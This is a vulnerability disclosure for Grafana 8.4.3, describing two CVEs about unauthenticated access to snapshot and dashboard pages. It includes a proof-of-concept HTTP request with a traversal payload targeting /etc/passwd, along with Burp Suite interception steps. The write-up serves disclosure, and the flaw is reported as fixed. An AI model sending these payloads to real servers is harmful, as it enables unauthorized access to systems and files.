grafana

grafana 8.4.3 (b7d2911ca), works on 8.5.5 ( tested for @TheFrenchGhosty )

First point - CVE-2022-32276

Unauthenticated and authenticated users can send a false request for snapshot query using random key parameters, having access to the system dashboard area by going through the login page.

• Rated version: 8.4.3 (b7d2911ca) • Access the system the user is directed to the system home page, as image 1

Image 1: login form

It has been verified that an unauthenticated user knowing the vulnerable directories can enter random ID value which allows unauthenticated access to the hospitalized system pages. Parameter used: /dashboard/snapshot/*?orgId=0 /invite/:

Image 2: Unauthenticated access to snapshot list

Image 3: Unauthenticated access to the dashboard menu

Image 4: Unauthenticated access to the filter menu

Second point - CVE-2022-32275

• Rated version: 8.4.3 (b7d2911ca) • Injection of parameters in http request.

The failure is not a path traversal, but a session control failure. When the traversal path is explored, the authentication system redirects to an internal system page that should only be accessed by authenticated users.

Image 5: login form

Viewing the request in burpsuite

Image 6: Intercepting the request by burpsuite

Change the request by adding /{{constructor.constructor'/.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd?orgId=1 , encode : /dashboard/snapshot/%7B%7Bconstructor.constructor'/.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd?orgId=1 HTTP/1.1

Image 7: Request changed before submission to server

Image 8: Data returned from the tampered request

POC 2

Send the request to the Burpsuite Repeater function and change the request header to:

GET /dashboard/snapshot/%7B%7Bconstructor.constructor'/.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd?orgId=1 HTTP/1.1
Host: <grafana_host>:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-BR,en;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close-up
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

Image 9: Changing the request in the repeater function.

Image 10: Unauthenticated access

References:

https://cwe.mitre.org/data/definitions/1345.html

https://cwe.mitre.org/data/definitions/284.html

https://cwe.mitre.org/data/definitions/552.html

https://cwe.mitre.org/data/definitions/548.html

https://cwe.mitre.org/data/definitions/706.html

https://owasp.org/www-pdf-archive/OWASP_SCP_v1.3_pt-BR.pdf

Just for information, the failure pointed out generated task 53051 (grafana/grafana#53051) which was completed by the grafana team and ended on 08/01/2022

grafana/grafana#53051